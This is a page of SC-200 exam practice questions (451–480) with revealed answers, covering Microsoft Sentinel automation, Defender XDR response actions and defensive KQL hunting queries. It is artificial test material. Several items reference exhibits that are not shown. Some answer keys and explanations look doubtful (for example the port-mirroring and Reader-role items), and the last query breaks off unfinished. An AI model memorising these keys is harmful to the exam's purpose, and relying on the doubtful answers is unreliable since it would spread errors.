Microsoft Security Operations Analyst SC-200 (SC-200) — Questions 451–525

1639 questions total · 22 pages · All types, answers revealed


Page 7 of 22

451
Multi-Select (medium)

A security operations center (SOC) is configuring automated investigation and response (AIR) for Microsoft Defender for Office 365. Which of the following actions can be automatically taken when a malicious email is detected by AIR policies? (Choose all that apply.)

Select 2 answers
A. Soft delete the email from user mailbox
B. Add the sender to the user's blocked sender list
C. Quarantine the email
D. Permanently delete the email from all mailboxes
Answers: A, C

AIR can be configured to soft delete emails, moving them to the Deleted Items folder.

Why this answer

Option A is correct because AIR policies in Microsoft Defender for Office 365 can automatically soft-delete a malicious email from a user's mailbox. Soft deletion moves the email to the Recoverable Items folder, allowing administrators to restore it if needed, which is a standard remediation action for confirmed threats. Option C is correct because quarantining the email is likewise an automated AIR remediation action: the message is removed from the mailbox and held in quarantine for review.

Exam trap

The trap here is that candidates often confuse manual user-side actions (like adding a sender to a blocked list) with automated AIR remediation actions, or assume that 'permanently delete' is a valid automated response when Microsoft deliberately avoids irreversible actions in AIR to prevent data loss.

452
Multi-Select (easy)

Which TWO features are available in Microsoft Sentinel to automate incident response?

Select 2 answers
A. Playbooks based on Azure Logic Apps.
B. Workbooks.
C. Kusto Query Language (KQL) queries.
D. UEBA.
E. Automation rules.
Answers: A, E

Playbooks automate response actions.

Why this answer

Playbooks based on Azure Logic Apps are correct because they provide a native, low-code automation framework within Microsoft Sentinel. They allow security analysts to define and execute complex, multi-step response actions—such as isolating a compromised VM, blocking an IP address, or opening a ticket—triggered by alerts or incidents. This directly automates incident response workflows without manual intervention.

Exam trap

The trap here is that candidates often confuse detection or analysis tools (Workbooks, KQL, UEBA) with automation tools, failing to recognize that only Playbooks and Automation Rules provide the actual execution of response actions in Sentinel.

453
MCQ (medium)

You are reviewing an automation rule in Microsoft Sentinel with the configuration shown in the exhibit. The rule is intended to delete a custom analytics rule when an incident is created. What is the most likely issue with this configuration?

A. The displayName should not contain spaces.
B. Automation rules cannot delete analytics rules; they are designed to automate incident response.
C. The playbook does not have permissions to delete analytics rules.
D. The incidentType should be set to 'AnalyticsRule' instead of 'Alert'.
Answer: B

Automation rules are for incident actions, not for managing analytics rules.

Why this answer

Automation rules in Microsoft Sentinel are designed to automate incident response actions, such as assigning ownership, changing status, or running playbooks. They cannot directly delete or modify analytics rules; that capability is not part of the automation rule schema or actions. The intended action in the exhibit (deleting a custom analytics rule) is outside the scope of what automation rules can perform.

Exam trap

The trap here is that candidates may confuse the scope of automation rules with the broader capabilities of playbooks or Logic Apps, assuming that any action possible via a playbook is also available as a direct automation rule action.

How to eliminate wrong answers

Option A is wrong because displayName values in automation rules can contain spaces; there is no restriction against spaces in the display name field. Option B is correct as stated. Option C is wrong because the issue is not about permissions; automation rules do not have an action to delete analytics rules, regardless of playbook permissions.

Option D is wrong because incidentType is not a configurable property in automation rules; the trigger condition for automation rules is based on incident creation or update, not a property called 'incidentType'.

454
MCQ (hard)

The exhibit shows an automation rule in Microsoft Sentinel. The analyst reports that the playbook is not triggered for high-severity incidents. What is the most likely cause?

A. The playbook resource ID is invalid.
B. The condition syntax is incorrect.
C. The tenant ID is missing.
D. The rule triggers only on incident creation, not on updates.
Answer: D

Incidents updated to high severity after creation won't trigger the rule.

Why this answer

The trigger type 'IncidentCreated' only fires when a new incident is created. If incidents are updated to high severity after creation, they are not created again, so the rule won't trigger. Option B is wrong because the condition is correctly written; Option C is irrelevant; Option A is a possible issue but less likely given the rule is already created.

455
MCQ (medium)

Your organization uses Microsoft Defender for Cloud Apps and Microsoft Sentinel. An alert indicates that an external IP address is downloading large amounts of data from a SharePoint site containing confidential documents. The activity is coming from a valid user account that appears to be compromised. What should you do first to stop the data exfiltration?

A. Delete the confidential documents from SharePoint
B. Suspend the user account in Microsoft Entra ID
C. Block the external IP address in Microsoft Defender for Cloud Apps
D. Change the SharePoint site permissions to deny access
Answer: B

Suspending the account stops the download immediately.

Why this answer

Option B is correct because suspending the user account immediately stops the download. Option C is wrong because blocking the IP may not be effective if the attacker uses multiple IPs. Option D is wrong because changing permissions is slower.

Option A is wrong because deleting files destroys evidence.

456
MCQ (medium)

During an incident response, you need to collect email messages from a user's mailbox in Microsoft 365 for evidence. The user is suspected of phishing. Which Microsoft Purview solution should you use?

A. eDiscovery (Standard)
B. Data Loss Prevention
C. Records Management
D. Audit (Standard)
Answer: A

eDiscovery allows searching and exporting mailbox content.

Why this answer

Option A is correct because eDiscovery (Standard) allows authorized users to search and export mailbox content, including email messages, for legal and investigative purposes. Option B is wrong because DLP is for data loss prevention, not collection. Option C is wrong because Records Management is for retention labels.

Option D is wrong because Audit logs track activities, not content collection.

457
Multi-Select (medium)

You are configuring Microsoft Defender for Identity (MDI) in your on-premises Active Directory environment. You need to ensure that MDI can detect lateral movement attacks. Which two configurations are required?

Select 2 answers
A. Enable port mirroring on the domain controller switches.
B. Install the MDI sensor on all domain controllers.
C. Integrate with Microsoft Defender for Cloud.
D. Configure Azure AD Connect to sync identities.
E. Configure site-to-site VPN to Azure.
Answers: A, B

Port mirroring allows the sensor to see domain controller network traffic.

Why this answer

Option B is correct because MDI sensors must be installed on domain controllers. Option A is correct because port mirroring or network capture is required. Option D is incorrect because Azure AD Connect is not required for MDI.

Option E is incorrect because MDI does not require a VPN. Option C is incorrect because Microsoft Defender for Cloud is a separate service.

458
MCQ (easy)

You are a security operations analyst for a company that uses Microsoft Sentinel. You need to create a workbook that displays the top 10 most common alert types over the last 7 days. The workbook will be used by the SOC manager to identify trends. You have already created a new workbook and added a query step. Which KQL query should you use in the query step?

A. AlertInfo | where TimeGenerated > ago(7d) | project AlertName
B. AlertInfo | where TimeGenerated > ago(7d) | project AlertName, count()
C. AlertInfo | where TimeGenerated > ago(7d) | summarize Count = count() by AlertName | top 10 by Count desc | render barchart
D. AlertInfo | where TimeGenerated > ago(7d) | summarize count() by bin(TimeGenerated, 1d) | render timechart
Answer: C

Correctly produces top 10 bar chart.

Why this answer

Option C is correct because it uses the `summarize` operator to count alerts by `AlertName`, then `top 10 by Count desc` to return the ten most frequent alert types, and `render barchart` to visualize the data in the workbook. This directly meets the requirement to display the top 10 most common alert types over the last 7 days.

Exam trap

The trap here is that candidates often confuse the `project` operator with `summarize`, mistakenly thinking they can use `count()` in a `project` clause, or they choose a query that shows alert volume over time instead of the top alert types by name.

How to eliminate wrong answers

Option A is wrong because it only projects the `AlertName` column without any aggregation, so it would return a list of all individual alerts rather than a count of the most common types. Option B is wrong because `project AlertName, count()` is invalid syntax; `count()` is an aggregation function that must be used within a `summarize` operator, not in a `project` clause. Option D is wrong because it summarizes by `bin(TimeGenerated, 1d)`, which groups alerts by day rather than by alert name, and renders a timechart showing alert volume over time, not the top 10 alert types.

459
MCQ (easy)

A security analyst is investigating an incident in Microsoft 365 Defender where a device is detected as infected with a trojan. The analyst wants to use automated investigation to contain the threat. Which action can be automatically taken on the affected device as part of a standard AIR playbook for endpoint detection and response?

A. Remove the user account from the device.
B. Execute a full antivirus scan on the device.
C. Disable the network adapter.
D. Initiate a device isolation.
Answer: D

Device isolation is a standard AIR action that quarantines the device from the network while allowing communication with Microsoft 365 Defender services for management.

Why this answer

In Microsoft Defender for Endpoint, the Automated Investigation and Response (AIR) playbook for endpoint detection and response includes the ability to isolate a device from the network. This action stops the device from communicating with other devices or the internet, containing the threat while allowing the investigation to continue. Option D is correct because device isolation is a standard containment action in the AIR playbook for trojan infections.

Exam trap

The trap here is that candidates often confuse 'run a full antivirus scan' (a remediation action) with 'containment' (a first-step action), leading them to select Option B instead of recognizing that isolation is the primary automated containment action in the AIR playbook.

How to eliminate wrong answers

Option A is wrong because removing a user account is not an automated action in the AIR playbook; user account management is a manual remediation step and does not contain the threat at the device level. Option B is wrong because executing a full antivirus scan is a response action that can be triggered manually or via a live response command, but it is not an automated containment action in the standard AIR playbook; the playbook focuses on containment first. Option C is wrong because disabling the network adapter is not a supported automated action in the AIR playbook; device isolation achieves the same goal by blocking network communication at the Defender platform level without physically disabling the adapter.

460
MCQ (medium)

Refer to the exhibit. You are configuring a Microsoft Sentinel Windows Security Events via AMA connector using an ARM template. After deployment, you notice that no Windows events are being ingested. The AMA agent is installed on the Windows servers. What is the most likely issue?

A. The WindowsEvent and SecurityEvent data types are disabled.
B. The Azure Monitor Agent is not installed on the servers.
C. The data collection rule is not associated with the virtual machines.
D. The workspace ID is missing from the template.
Answer: C

Missing DCR association prevents data ingestion.

Why this answer

The data collection rule (DCR) must be associated with the virtual machines. The ARM template shown only configures the connector but does not create the DCR association. Option B is wrong because the agent is already installed.

Option A is wrong because the data types are enabled. Option D is wrong because the workspace ID is typically provided.

461
Multi-Select (easy)

Your organization plans to implement Microsoft Sentinel. Which THREE components are required for a basic deployment? (Choose three.)

Select 3 answers
A. User and Entity Behavior Analytics (UEBA) enabled.
B. Analytics rules to generate incidents.
C. At least one data connector enabled.
D. Bookmarks for incident investigations.
E. A Log Analytics workspace.
Answers: B, C, E

Analytics rules detect threats.

Why this answer

Analytics rules are required to generate incidents from the data ingested into Microsoft Sentinel. Without analytics rules, the raw log data remains unprocessed and no security incidents are created, making the deployment non-functional for detection and response.

Exam trap

The trap here is that candidates often mistake optional advanced features like UEBA or bookmarks as required components, when in fact only the workspace, a data connector, and analytics rules are necessary to establish a basic, functional Sentinel deployment.

462
MCQ (hard)

The analyst notices that the rule does not fire for a user who has 12 sign-ins from the same IP address, but all are low risk. The expected behavior is to alert when a single user has more than 10 sign-ins from the same IP with at least one high-risk sign-in. What is the issue?

A. The join should be on UserPrincipalName only, not IPAddress.
B. The join should be leftouter to include sign-ins without high risk.
C. The threshold is set to 10, but the user has 12 sign-ins, so it should fire.
D. The query requires a high-risk sign-in from the same IP, but none exist, so no match.
Answer: D

The inner join only returns rows where a high-risk sign-in exists for that user and IP.

Why this answer

Option D is correct. The join requires high-risk sign-ins from the same IP, but the threshold only applies to the first aggregation. If all sign-ins are low risk, no high-risk join match occurs.

Option C is wrong because the threshold is 10 and 12 sign-ins do exceed it; the count condition is met, and it is the join that eliminates the row. Option B is wrong because the join is intentionally inner: it filters out user/IP pairs that have no high-risk sign-in, which is exactly what the requirement demands. Option A is wrong because the join must be on both fields, since the requirement is the same user from the same IP.
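The exhibit's query is not reproduced on this page. The following is an added example (not the exam's or the page's own query) written with the structure described above: the count threshold is applied in the first aggregation, and an inner join then requires a high-risk sign-in for the same user and IP. The one-hour lookback and the SigninLogs column names are assumptions.

```kusto
// Added example, not the exhibit's query: an analytics rule with the
// structure described in Q462. The count threshold is applied only in the
// first summarize; the inner join then requires at least one high-risk
// sign-in for the same user and IP. A user with 12 low-risk sign-ins
// passes the threshold but is dropped by the join, so no alert fires.
let lookback = 1h;          // assumed rule lookback
let MinSignIns = 10;        // threshold from the question
let AllSignIns = SigninLogs
    | where TimeGenerated > ago(lookback)
    | summarize SignInCount = count(),
                FirstSeen = min(TimeGenerated),
                LastSeen = max(TimeGenerated)
          by UserPrincipalName, IPAddress
    | where SignInCount > MinSignIns;
let HighRisk = SigninLogs
    | where TimeGenerated > ago(lookback)
    | where RiskLevelDuringSignIn == "high"
    | summarize HighRiskSignIns = count() by UserPrincipalName, IPAddress;
AllSignIns
// kind=inner: rows without a matching high-risk sign-in are discarded.
// Changing this to kind=leftouter (option B) would fire on volume alone
// and no longer enforce the "at least one high-risk sign-in" requirement.
| join kind=inner HighRisk on UserPrincipalName, IPAddress
| project UserPrincipalName, IPAddress, SignInCount, HighRiskSignIns,
          FirstSeen, LastSeen
```

The absence of an alert for the 12 low-risk sign-ins is therefore the inner join working as designed, not a defect in the threshold.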

463
MCQ (easy)

In Microsoft Sentinel, an incident is created from a Fusion rule that correlates multiple alerts. The incident has a high severity. What should the analyst do first?

A. Run an automated playbook to contain the threat
B. Close the incident as false positive
C. Triage the incident by reviewing the evidence
D. Escalate the incident to senior management
Answer: C

Triage confirms the validity and urgency.

Why this answer

Option C is correct because the first step in incident response within Microsoft Sentinel is to triage the incident by reviewing the evidence. A Fusion rule correlates multiple alerts into a single incident, and the analyst must examine the correlated alerts, entities, and timeline to validate the incident's legitimacy and understand the scope before taking any action. Automated playbooks or escalations should only occur after triage confirms the incident is a genuine threat.

Exam trap

The trap here is that candidates may assume a high-severity incident automatically requires immediate containment or escalation, but Microsoft Sentinel's incident response process mandates triage first to validate the correlation and avoid acting on false positives.

How to eliminate wrong answers

Option A is wrong because running an automated playbook to contain the threat should only occur after triage confirms the incident is a real threat; premature automation could disrupt legitimate operations or waste resources on a false positive. Option B is wrong because closing the incident as a false positive without reviewing the evidence violates the incident response process and could miss a genuine attack that the Fusion rule correctly identified. Option D is wrong because escalating to senior management is premature before triage; escalation should happen only after the analyst has assessed the incident's severity and impact.

464
MCQ (hard)

Refer to the exhibit. A threat hunter runs this PowerShell script to query Microsoft Sentinel. The script fails with an error stating that the query language is not recognized. What is the most likely cause?

A. The query contains a reference to a table that does not exist in the workspace.
B. The cmdlet requires the query to be passed as a script block, not a string.
C. The query should use 'search' instead of 'where' for cross-table queries.
D. The query uses pipe syntax ('|') which is not supported by the PowerShell cmdlet.
Answer: A

If the workspace does not have DeviceProcessEvents table, the query fails with a language error.

Why this answer

Option A is correct. The script in the exhibit defines the query as a plain double-quoted string, $query = "DeviceProcessEvents | where FileName == 'reg.exe' | project Timestamp, DeviceName, AccountName", and passes it to Invoke-AzOperationalInsightsQuery, a valid cmdlet that accepts KQL as a string. The query itself is valid KQL: the single quotes around 'reg.exe' do not interfere with PowerShell string interpolation, and the only oddity in the script is a $table variable that is declared but never used. Of the four options, the only one that can make the query fail is a reference to a table that does not exist in the workspace; if DeviceProcessEvents is not present, Log Analytics rejects the query.

Note that a missing table is normally reported as a semantic error rather than as an unrecognized query language, so an incorrect WorkspaceId or missing permissions are also worth checking in practice; among the listed options, however, only A describes a condition that causes the query to fail.

Option B is wrong because the cmdlet takes the query as a string, not a script block. Option C is wrong because 'where' on a named table is the correct form; 'search' is not required for a single-table query. Option D is wrong because pipe syntax is standard KQL and is fully supported by the cmdlet.

465
MCQ (easy)

An incident in Microsoft Sentinel has been classified as a true positive. According to the incident response process, what should the analyst do next?

A. Contain the incident to prevent further damage.
B. Perform a root cause analysis.
C. Create a new analytic rule to detect similar activity.
D. Document the incident in a detailed report.
Answer: A

Containment is the immediate priority after confirming a true positive.

Why this answer

Option A is correct. After an incident is classified as a true positive, the analyst should contain the threat to prevent further damage. Option B is wrong because root cause analysis is done after containment.

Option C is wrong because creating a new analytic rule is a post-incident activity. Option D is wrong because detailed documentation follows containment and the later phases.

466
MCQ (hard)

Refer to the exhibit. You are configuring an automation rule in Microsoft Sentinel. The rule triggers when an incident is created, changes its status to 'Active', assigns it to 'tier2', and runs a playbook. However, you notice that the playbook is not executing for incidents with severity 'Low'. What is the most likely reason?

A. The triggers array is empty, so no incidents trigger the rule.
B. The rule has a condition that filters out Low severity incidents.
C. The playbook is disabled in Microsoft Sentinel.
D. The severityFilter excludes incidents with severity 'Low'.
Answer: D

SeverityFilter only includes High and Medium.

Why this answer

Option D is correct because the severityFilter is set to 'High,Medium', so incidents with severity 'Low' are not processed by this automation rule. Option A is wrong because the triggers array is not empty. Option B is wrong because there is no separate condition blocking Low severity.

Option C is wrong because nothing in the exhibit shows the playbook as disabled.

467
MCQ (medium)

An analyst is using Microsoft Sentinel to hunt for signs of privilege escalation via token manipulation. Which Windows Security Event ID should the analyst focus on to detect potential token duplication or manipulation?

A. 4688 - A new process has been created
B. 4672 - Special privileges assigned to new logon
C. 4624 - An account was successfully logged on
D. 4648 - A logon was attempted using explicit credentials
Answer: B

This event is triggered when a logon has special privileges, often indicating token manipulation.

Why this answer

Option B is correct because Event ID 4672 (Special Logon) is generated when a logon is assigned special privileges, which is often associated with token manipulation. Option C is wrong because 4624 is a generic logon event, not specifically token-related. Option D is wrong because 4648 indicates that explicit credentials were used.

Option A is wrong because 4688 is a process creation event.

468
MCQ (hard)

You are a security operations architect for a company that uses Microsoft Sentinel in a hybrid environment with multiple workspaces. The company has a central SOC team that needs to view incidents from all workspaces in a single pane of glass. Each workspace belongs to a different business unit and has its own retention and access policies. You need to design a solution that provides centralized incident management without duplicating data or requiring users to switch workspaces. You also need to ensure that the SOC team can perform actions on incidents across workspaces. What should you do?

A. Create a playbook that copies incidents from all workspaces to a central workspace.
B. Use Microsoft Sentinel incident multi-view to connect all workspaces.
C. Use the Microsoft Sentinel data connector to connect all workspaces to a central workspace.
D. Create a new Log Analytics workspace that ingests data from all workspaces via diagnostic settings.
Answer: B

Incident multi-view provides centralized incident management.

Why this answer

Microsoft Sentinel incident multi-view allows SOC teams to view and manage incidents across multiple workspaces from a single interface without duplicating data. This feature provides a centralized pane of glass while respecting each workspace's independent retention and access policies, and it enables cross-workspace incident actions without requiring users to switch contexts.

Exam trap

The trap here is that candidates often confuse data connectors or workspace aggregation with incident-level cross-workspace management, failing to realize that incident multi-view is the only native feature that provides a single pane of glass without data duplication or policy compromise.

How to eliminate wrong answers

Option A is wrong because creating a playbook to copy incidents duplicates data, increases storage costs, and violates the requirement to avoid data duplication; it also introduces latency and complexity. Option C is wrong because the Microsoft Sentinel data connector ingests log data into a central workspace, which duplicates data and merges retention/access policies, contradicting the requirement for each workspace to maintain its own policies. Option D is wrong because creating a new Log Analytics workspace that ingests data via diagnostic settings duplicates all log data, incurs additional ingestion and storage costs, and does not provide native incident management capabilities across workspaces.

469
MCQ (hard)

An organization uses Microsoft Defender XDR. During an incident investigation, the security team needs to determine if a specific file was executed on any devices in the organization over the past 30 days. They have the file hash. What is the most efficient way to get this information?

A. Use the action center to search for the file
B. Use advanced hunting to query for file execution events
C. Review the incident timeline for the file
D. Check the device inventory for the file
Answer: B

Advanced hunting enables powerful KQL queries across device timelines.

Why this answer

Option B is correct because advanced hunting in Microsoft Defender XDR allows querying for file execution events across all devices using the file hash. Option D is wrong because the device inventory does not show execution history. Option C is wrong because the incident timeline is for a specific incident, not a file search across devices.

Option A is wrong because the action center is for response actions, not queries.

470
MCQ (hard)

During an incident response, you need to collect a memory dump from a compromised Windows 10 device managed by Microsoft Defender for Endpoint. Which action should you take in the Microsoft Defender XDR portal?

A. Run a custom detection script
B. Initiate a Live Response session and run the 'memdump' command
C. Execute a Power Automate flow to collect memory
D. Start a full antivirus scan
E. Submit the device for automated investigation
Answer: B

Live Response provides a remote shell to run commands such as 'memdump'.

Why this answer

Live Response allows executing commands on the device, including collecting a memory dump. Running a custom detection script, a Power Automate flow, an antivirus scan, or an automated investigation does not collect a memory dump; those options are not available actions for this task.

471
Multi-Select (easy)

Which TWO sources of evidence should a security analyst examine first when investigating a user-reported phishing email in Microsoft Defender XDR?

Select 2 answers
A. The email entity page
B. The action center
C. The user's mailbox audit log
D. The user's device timeline
E. Advanced hunting for email events
Answers: A, C

Email entity page contains key email details.

Why this answer

Options A and C are correct. Option A: the email entity page provides details about the email, including sender and links. Option C: the user's mailbox audit log shows whether the user interacted with the email.

Option D is wrong because the device timeline is not relevant for email. Option B is wrong because the action center is for response actions. Option E is wrong because advanced hunting is for complex queries, not a first step.

472
MCQ (medium)

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. You need to ensure that a new SOC analyst can triage incidents without being able to delete or modify analytics rules. Which role should you assign?

A. Security Reader
B. Microsoft Sentinel Reader
C. Global Reader
D. Security Operator
Answer: B

This role grants read access to Sentinel data, including incidents, without modification rights.

Why this answer

Microsoft Sentinel Reader provides read-only access to Sentinel data, including incidents, workbooks, and analytics rules, but explicitly prevents any modifications or deletions. This role is ideal for SOC analysts who need to triage incidents without altering detection configurations. Security Reader and Global Reader lack Sentinel-specific incident triage permissions, while Security Operator allows modification of incidents, which exceeds the required scope.

Exam trap

The trap here is that candidates often confuse Security Reader (which provides broad read-only access across security services) with Sentinel Reader (which is Sentinel-specific), or they assume Security Operator is sufficient because it allows incident management, but it does not grant the Sentinel-specific read permissions needed to view analytics rules without modification capabilities.

How to eliminate wrong answers

Option A is wrong because Security Reader provides read-only access to security configurations and alerts in Microsoft Defender XDR but does not include the Sentinel-specific permissions needed to triage incidents in the Sentinel portal. Option C is wrong because Global Reader grants read-only access across all Azure services, including Sentinel, but it is overly broad and not scoped to Sentinel incident triage; it also does not provide the precise Sentinel Reader permissions required. Option D is wrong because Security Operator allows management of incidents (e.g., changing status, assigning ownership) in Microsoft Defender XDR, which would permit modifications beyond triage, and it does not grant the Sentinel-specific read-only access needed for analytics rules.

473
MCQ (hard)

A security administrator wants to ensure that all Azure virtual machines have Microsoft Defender for Cloud's vulnerability assessment (VA) solution enabled automatically. They need to deploy the VA solution to new and existing VMs without manual intervention. Which method should they use?

A. Configure 'Vulnerability assessment for machines' in Defender for Cloud settings
B. Assign an Azure Policy with DeployIfNotExists effect for the VA solution
C. Enable the Defender for Servers plan on the subscription
D. Run a PowerShell script to install the VA solution on all VMs
Answer: B

This policy automatically deploys the VA solution (e.g., Qualys or integrated VA) to VMs that do not have it, ensuring all VMs are covered.

Why this answer

Option B is correct because Azure Policy with a DeployIfNotExists effect can automatically deploy the Microsoft Defender for Cloud integrated vulnerability assessment (VA) solution (Qualys or Microsoft) to both new and existing Azure VMs without manual intervention. This policy evaluates VMs that do not have the VA extension installed and triggers a remediation task to deploy it, ensuring continuous compliance across the subscription.

Exam trap

The trap here is that candidates often confuse enabling the Defender for Servers plan (which only activates the feature) with the automatic deployment mechanism provided by Azure Policy, leading them to select option C instead of the correct policy-based approach.

How to eliminate wrong answers

Option A is wrong because configuring 'Vulnerability assessment for machines' in Defender for Cloud settings only enables the VA solution at the plan level but does not automatically deploy the agent to existing or new VMs; it requires manual installation or a separate deployment mechanism. Option C is wrong because enabling the Defender for Servers plan on the subscription activates threat detection and security alerts but does not automatically deploy the VA solution; it only makes the VA feature available for manual enablement. Option D is wrong because running a PowerShell script to install the VA solution on all VMs is a one-time manual action that does not provide ongoing automatic deployment for new VMs and lacks the compliance enforcement and remediation capabilities of Azure Policy.

474
Multi-Selecteasy

You are investigating a phishing incident in Microsoft Defender for Office 365. Which THREE pieces of information are available in the Threat Explorer?

Select 3 answers
A.Email body content
B.User's mailbox audit log
C.Sender IP address
D.Delivery action (e.g., blocked, delivered to Junk)
E.Email subject and sender address
AnswersC, D, E

Sender IP is available in Threat Explorer.

Why this answer

Options C, D, and E are correct. Threat Explorer shows the email subject and sender address, the sender IP address, and the delivery action (for example blocked, delivered, or delivered to Junk) for each message. Option A is wrong because the message body is not part of the Threat Explorer results. Option B is wrong because mailbox audit records live in the audit log search, not in Threat Explorer.

475
MCQmedium

Your organization uses Microsoft Defender for Office 365. You need to ensure that when a user reports a phishing email via the built-in Outlook add-in, an automated investigation is triggered in Microsoft 365 Defender. What should you configure?

A.Define a safe links policy.
B.Enable user-reported message settings in the Microsoft 365 Defender portal.
C.Configure an anti-phishing policy.
D.Set up a safe attachments policy.
AnswerB

User-reported message settings allow you to configure how reported emails are handled, including triggering automated investigation and response.

Why this answer

Option B is correct because the user-reported message settings define where reported messages go and whether a reported message triggers an automated investigation. Option A is wrong because Safe Links policies handle URL rewriting and time-of-click checks, not user reports. Option C is wrong because anti-phishing policies protect against impersonation and spoofing, not handling user reports.

Option D is wrong because Safe Attachments policies handle attachment detonation.

476
MCQmedium

Your organization is using Microsoft Defender for Identity (MDI) and Microsoft Sentinel. The security team wants to correlate alerts from MDI with other data sources in Sentinel. What is the recommended approach?

A.Export MDI logs manually to Sentinel
B.Configure MDI to send syslog to Sentinel
C.Create a playbook to pull MDI alerts
D.Enable the Microsoft Defender for Identity data connector in Sentinel
AnswerD

The data connector automatically ingests MDI alerts into Sentinel.

Why this answer

Option D is correct because the Microsoft Defender for Identity data connector ingests MDI alerts into Sentinel, where they can be correlated with other data sources. Option A is wrong because manual export is not scalable or continuous. Option B is wrong because syslog forwarding is not the supported path for getting MDI alerts into Sentinel.

Option C is wrong because playbooks are for response, not data ingestion.

477
MCQeasy

Refer to the exhibit. A SOC analyst runs this KQL query in Microsoft Sentinel. What is the purpose of this query?

A.Detect brute force attempts by finding users with many failed sign-ins from a single IP
B.List all successful sign-ins in the last hour
C.Identify users who successfully signed in from multiple IPs
D.Find users with more than 5 failed sign-ins from an IP address in the last hour
AnswerD

The query counts failed sign-ins per user and IP, and filters for >5.

Why this answer

The KQL query filters for events where the result type is 'Failure' (failed sign-ins), then groups by account and IP address, counting occurrences. The `where count_ > 5` clause ensures only accounts with more than 5 failed sign-ins from a single IP are returned, which is a classic indicator of a brute force attack. This directly matches option D.

Exam trap

The trap here is that candidates may confuse 'failed sign-ins from a single IP' (option D) with 'many failed sign-ins' (option A), missing the explicit threshold of >5 in the query.

How to eliminate wrong answers

Option A is wrong because the query specifically counts failed sign-ins per IP and user, not just any user with many failed sign-ins from a single IP—it requires more than 5 failures, not just 'many'. Option B is wrong because the query filters for 'Failure' events, not successful sign-ins, and it groups by IP and user rather than listing all successful sign-ins. Option C is wrong because the query focuses on failed sign-ins, not successful ones, and it groups by single IP per user, not multiple IPs.
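The exhibit is not reproduced above. The following is an added KQL example (not the original exhibit) that implements the logic the explanation describes: failed sign-ins grouped by account and source IP, filtered at more than 5 in the last hour. It also unions the non-interactive sign-in table; the threshold, window, and the error-code sample size are assumptions.

```kql
// Added example: failed sign-ins per user and source IP in the last hour.
// Threshold (5) and window (1h) are assumptions taken from the question text.
let threshold = 5;
let window = 1h;
// Interactive and non-interactive sign-ins share the columns used below.
union isfuzzy=true SigninLogs, AADNonInteractiveUserSignInLogs
| where TimeGenerated > ago(window)
// ResultType "0" is success; every other code is a failure (e.g. 50126 = invalid password).
| where ResultType != "0"
| summarize FailedCount = count(),
            FirstFailure = min(TimeGenerated),
            LastFailure = max(TimeGenerated),
            ErrorCodes = make_set(ResultType, 10)
          by UserPrincipalName, IPAddress
| where FailedCount > threshold
| order by FailedCount desc
```

Swapping the by clause to IPAddress alone and adding dcount(UserPrincipalName) turns this into the password-spray variant, which a per-user threshold like this one misses because each account sees only one or two failures.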

478
Multi-Selectmedium

Which THREE features in Microsoft Sentinel allow an analyst to automate incident response actions?

Select 3 answers
A.Playbooks (Logic Apps)
B.Watchlists
C.Workbooks
D.Automation rules
E.Analytics rules with incident automation
AnswersA, D, E

Playbooks perform complex automated workflows.

Why this answer

Automation rules, playbooks (Logic Apps), and analytics rules with automated responses are all automation features. Watchlists are for reference data, not automation. Workbooks are for visualization.

479
MCQmedium

A threat hunter runs the KQL query above in Microsoft Sentinel. What is the main limitation of this query?

A.The query relies on an external data source that may be slow or unavailable
B.The IdentityLogonEvents table does not have an IPAddress column
C.The let statement is incorrectly defined because it uses externaldata without a schema
D.The with(format="csv") is invalid
AnswerA

Externaldata can be slow and unreliable for real-time hunting.

Why this answer

Using externaldata() to fetch a list from a public URL adds latency on every run, fails if the URL is unreachable, and returns whatever the file contains at that moment, so the list can be stale. Option B is incorrect because IdentityLogonEvents does contain an IPAddress column. Option C is incorrect because the let statement is valid as written.

Option D is incorrect because externaldata supports with(format="csv").
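The exhibit is not reproduced above. The following is an added KQL example (not the original exhibit) of the externaldata pattern the question discusses, run in Sentinel against IdentityLogonEvents; the feed URL is a placeholder assumption, and the CSV is assumed to have a header row with one column named ip.

```kql
// Added example: match identity logons against an externally hosted IP list.
// The URL is an assumption; point it at a real CSV feed (header "ip", one address per row).
// materialize() makes the remote fetch happen once, not once per join partition.
let BadIPs = materialize(
    externaldata(ip: string) [@"https://example.invalid/feeds/bad-ips.csv"]
        with (format="csv", ignoreFirstRecord=true)
    | where isnotempty(ip)
    | distinct ip
);
IdentityLogonEvents
| where Timestamp > ago(7d)
| where isnotempty(IPAddress)
| join kind=inner (BadIPs) on $left.IPAddress == $right.ip
| project Timestamp, AccountUpn, DeviceName, IPAddress, ActionType, LogonType, Protocol
| order by Timestamp desc
```

The limitation named in the question is the externaldata call itself: if the feed is down the whole query fails, and there is no history of what the list contained at detection time. For a list you own, a Sentinel watchlist queried with _GetWatchlist() is stored in the workspace and avoids both problems.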

480
Multi-Selectmedium

Which TWO data sources are most useful for detecting unauthorized lateral movement in a hybrid environment using Microsoft Sentinel?

Select 2 answers
A.Azure Activity Log
B.Network Security Group Flow Logs
C.Microsoft Defender for Endpoint DeviceLogonEvents
D.Windows Security Events (Event ID 4624)
E.Office 365 Audit Logs
AnswersC, D

DeviceLogonEvents provide logon information from endpoints, including network logons.

Why this answer

Options C and D are correct because Windows Security Events (Event ID 4624, especially logon types 3 and 10) show who logged on to which host from where, and Microsoft Defender for Endpoint DeviceLogonEvents provide the same telemetry from onboarded endpoints, including network logons. Option A is wrong because Azure Activity Log records control plane operations, not logons. Option B is wrong because Network Security Group flow logs show network traffic but not authentication.

Option E is wrong because Office 365 audit logs focus on cloud app activity, not host logons.
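As an added example (not from the original page), this KQL query uses both data sources above to surface one account reaching many distinct hosts over network or RDP logons in a short window, which is the shape lateral movement takes. The window and host-count thresholds are assumptions to tune per environment.

```kql
// Added example: one account performing successful network/RDP logons to many hosts
// within a short window, from endpoint telemetry and Windows Security Events.
// Thresholds (5 hosts within 10 minutes) are assumptions.
let window = 10m;
let hostThreshold = 5;
let mde = DeviceLogonEvents
    | where Timestamp > ago(1d)
    | where ActionType == "LogonSuccess" and LogonType in ("Network", "RemoteInteractive")
    | project Time = Timestamp,
              Account = tolower(strcat(AccountDomain, @"\", AccountName)),
              Source = RemoteIP, Target = DeviceName, Src = "DeviceLogonEvents";
let winsec = SecurityEvent
    | where TimeGenerated > ago(1d)
    | where EventID == 4624 and LogonType in (3, 10)      // 3 = network, 10 = RDP
    | where AccountType == "User" and TargetUserName !endswith "$"
    | project Time = TimeGenerated,
              Account = tolower(strcat(TargetDomainName, @"\", TargetUserName)),
              Source = IpAddress, Target = Computer, Src = "SecurityEvent";
union mde, winsec
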